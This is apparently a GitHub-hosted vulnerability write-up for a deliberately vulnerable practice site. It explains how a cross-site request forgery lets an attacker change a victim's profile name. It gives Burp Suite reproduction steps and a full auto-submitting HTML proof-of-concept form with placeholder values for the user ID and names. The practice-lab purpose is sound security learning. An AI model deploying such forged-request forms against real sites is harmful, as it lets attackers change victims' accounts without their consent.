-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy path#19 Edit profile using CSRF
27 lines (21 loc) · 1.27 KB
/
#19 Edit profile using CSRF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#19 Edit profile using CSRF
Summary: CSRF (Cross-Site Request Forgery) makes an attacker to change name of victim's account
Steps to reproduce: Go to edit profile, enter any random text and capture the request in burp. Then right click on the request, click on engagement tools, and Generate CSRF PoC. In options, enable Include auto-submit script, and click Regenerate and copy the code and drop the request. Now, create a HTML file in your system and paste the copied CSRF PoC and save and run the file. Now you can see that your first name and last name is changed.
Impact: An attacker can edit the profile of victim.
If you do not have Burpsuite pro, then here is the CSRF PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://hack-yourself-first.com/Account/UserProfile/$userid" method="POST">
<input type="hidden" name="IsAdmin" value="" />
<input type="hidden" name="UserId" value="333" />
<input type="hidden" name="FirstName" value="$firstname" />
<input type="hidden" name="LastName" value="$lastname" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
update $userid, $firstname and $lastname to their respective ones